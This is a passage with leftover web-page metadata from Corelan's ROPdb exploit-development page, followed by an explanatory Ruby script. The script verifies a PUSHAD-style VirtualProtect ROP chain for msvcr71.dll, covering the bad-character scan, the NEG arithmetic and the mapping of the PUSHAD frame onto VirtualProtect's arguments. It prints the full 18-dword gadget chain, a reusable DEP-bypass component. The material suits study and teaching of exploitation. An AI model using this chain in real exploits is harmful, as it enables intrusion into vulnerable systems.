Research","isPartOf":{"@id":"https:\/\/www.corelan.be\/#website"},"datePublished":"2026-03-12T20:03:28+00:00","dateModified":"2026-03-12T20:03:30+00:00","breadcrumb":{"@id":"https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.corelan.be\/"},{"@type":"ListItem","position":2,"name":"Corelan ROPdb"}]},{"@type":"WebSite","@id":"https:\/\/www.corelan.be\/#website","url":"https:\/\/www.corelan.be\/","name":"Corelan CyberSecurity Research","description":"Corelan publishes in-depth tutorials on exploit development, Windows exploitation, vulnerability research, heap internals, reverse engineering and security tooling used by professionals 
worldwide.","publisher":{"@id":"https:\/\/www.corelan.be\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.corelan.be\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.corelan.be\/#organization","name":"Corelan CyberSecurity Research","url":"https:\/\/www.corelan.be\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/","url":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","contentUrl":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","width":200,"height":200,"caption":"Corelan CyberSecurity Research"},"image":{"@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/corelanconsulting","https:\/\/x.com\/corelanc0d3r","https:\/\/x.com\/corelanconsulting","https:\/\/instagram.com\/corelanconsult"]}]}},"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/pages\/15026","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/comments?post=15026"}],"version-history":[{"count":1,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/pages\/15026\/revisions"}],"predecessor-version":[{"id":15027,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/pages\/15026\/revisions\/15027"}],"wp:attachment":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/media?parent=15
026"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
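Added example, not part of the ROPdb page and not mona.py output: the checks worth running on a PUSHAD-style VirtualProtect chain such as the msvcr71.dll one above before dropping it into an exploit. It packs the chain exactly as the page does and scans for bad characters, reproduces the NEG arithmetic behind the "value to negate" dwords, models ADD AL,imm8 as a byte-wide add (the carry out of AL is dropped, which is why the msvcr71 chain loads 0x7c37a151 and lets ADD AL,0EF wrap the low byte onto the IAT slot that JMP [EAX] dereferences), and walks the PUSHAD frame to show which register ends up as which VirtualProtect argument. All module addresses are the ones quoted in the smaller msvcr71 chain; STACK_AT_PUSHAD is an assumed stack pointer, since the real value depends on the target process. The frame walk is general: it applies to any of the mona-generated PUSHAD chains on this page given the register state they set up.

```ruby
# Added example for the chains on this page; it is not part of the Corelan
# ROPdb and not mona.py output. Module addresses are the msvcr71.dll values
# quoted in the "updated (smaller)" chain; STACK_AT_PUSHAD is an assumed
# value, since the real one depends on the target process.

# 32-bit two's-complement negation: what the NEG EAX / NEG EDX gadgets do.
def neg32(v)
  (-v) & 0xffffffff
end

# ADD AL,imm8 only touches the low byte of EAX; the carry out of AL is
# dropped and never reaches AH. A PUSHAD # ADD AL,0EF # RETN gadget is
# therefore compensated by loading EAX with a value whose low byte wraps
# back onto the wanted IAT slot, not by subtracting 0xEF from the pointer.
def add_al(eax, imm8)
  (eax & 0xffffff00) | ((eax + imm8) & 0xff)
end

# Pack the chain exactly as the page does and return the byte offsets of
# every bad character, so an empty array means the packed chain is clean.
def bad_char_offsets(chain, badchars = "\x00")
  bad = badchars.bytes
  chain.pack("V*").bytes.each_with_index.select { |b, _| bad.include?(b) }.map(&:last)
end

# PUSHAD pushes EAX, ECX, EDX, EBX, the pre-push ESP, EBP, ESI and EDI, so
# read upward from the new ESP the frame is EDI, ESI, EBP, ESP, EBX, EDX,
# ECX, EAX. With EDI = RETN and ESI = JMP [EAX], the two RETNs that follow
# PUSHAD land in the function whose IAT slot EAX holds, with EBP as its
# return address and ESP, EBX, EDX, ECX as arguments 1..4 of VirtualProtect.
PUSHAD_ORDER = %i[edi esi ebp esp ebx edx ecx eax].freeze

def virtualprotect_call(regs, al_delta: 0)
  frame = PUSHAD_ORDER.map { |r| regs.fetch(r) }
  {
    rop_nop:        frame[0],
    dispatcher:     frame[1],
    iat_slot:       add_al(regs[:eax], al_delta), # register value at JMP [EAX]
    return_address: frame[2],
    lpAddress:      frame[3],
    dwSize:         frame[4],
    flNewProtect:   frame[5],
    lpOldProtect:   frame[6],
    skipped_slot:   frame[7], # eaten by the POP EBP # RETN the call returns into
  }
end

STACK_AT_PUSHAD = 0x0012ff40 # assumed ESP at PUSHAD time (target dependent)

# Register state the smaller msvcr71 chain has built when PUSHAD runs.
MSVCR71_REGS = {
  eax: 0x7c37a151,                                          # becomes the IAT slot after ADD AL,0EF
  ecx: 0x7c38b001,                                          # writable dword for lpOldProtect
  edx: neg32(0xffffffc0),                                   # 0x40, PAGE_EXECUTE_READWRITE
  ebx: ((0xffffffff + 1) & 0xffffffff) + neg32(0xfffffdff), # INC EBX wraps to 0, ADD EBX,EAX adds 0x201
  esp: STACK_AT_PUSHAD,
  ebp: 0x7c376402,                                          # POP EBP # RETN: skips the EAX slot, returns past PUSHAD
  esi: 0x7c3415a2,                                          # JMP [EAX]
  edi: 0x7c347f98,                                          # RETN (ROP NOP)
}.freeze

# The page's 18-dword chain, copied here so the bad-char check has real input.
MSVCR71_CHAIN = [
  0x7c37653d, 0xfffffdff, 0x7c347f98, 0x7c3415a2, 0xffffffff, 0x7c376402,
  0x7c351e05, 0x7c345255, 0x7c352174, 0x7c344f87, 0xffffffc0, 0x7c351eb1,
  0x7c34d201, 0x7c38b001, 0x7c347f97, 0x7c37a151, 0x7c378c81, 0x7c345c30,
].freeze

def check_msvcr71_chain
  call = virtualprotect_call(MSVCR71_REGS, al_delta: 0xef)
  {
    null_free: bad_char_offsets(MSVCR71_CHAIN).empty?,
    call: call,
    ok: call[:dwSize] == 0x201 && call[:flNewProtect] == 0x40 &&
        call[:lpAddress] == STACK_AT_PUSHAD && call[:iat_slot] == 0x7c37a140,
  }
end

if __FILE__ == $PROGRAM_NAME
  r = check_msvcr71_chain
  puts "null-byte free: #{r[:null_free]}"
  r[:call].each { |k, v| puts format("  %-15s 0x%08x", k, v) }
  puts "frame matches VirtualProtect(lpAddress, dwSize, flNewProtect, lpOldProtect): #{r[:ok]}"
end
```

Running it prints the frame dword by dword. The same walk applies to the VirtualAlloc variant of the msvcrt.dll chain, with EBX, EDX and ECX read as dwSize, flAllocationType and flProtect instead; and a chain that loads 0x00000201 directly, like the XP msvcrt.dll ones, fails the bad-char scan at the two high bytes of that dword, which is exactly why the generic chains go through NEG.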